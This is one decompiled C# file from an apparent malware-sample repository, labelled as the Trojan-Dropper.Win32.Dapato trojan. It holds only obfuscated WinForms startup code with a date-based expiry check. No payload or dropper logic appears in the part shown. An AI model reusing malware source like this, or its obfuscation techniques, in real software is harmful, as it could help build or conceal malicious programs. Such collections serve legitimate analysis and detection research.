MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86/.cs
2022-08-18 06:28:56 -05:00

50 lines
1.5 KiB
C#

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: App, Version=6.11.5.1, Culture=neutral, PublicKeyToken=null
// MVID: 843578DF-6576-45E1-B6A2-485233E8A253
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfdc-b8ca4f2cda6f49778d6840b2eff24c49fe4212060200c667d42e2986a9ec3a86.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class \uE001 : WindowsFormsApplicationBase
{
[DebuggerStepThrough]
public \uE001()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
if (DateTime.Now > new DateTime(634748065896882000L))
throw new Exception();
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
\uE003.\uE001.Run(Args);
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) \uE003.\uE003.\uE000;
}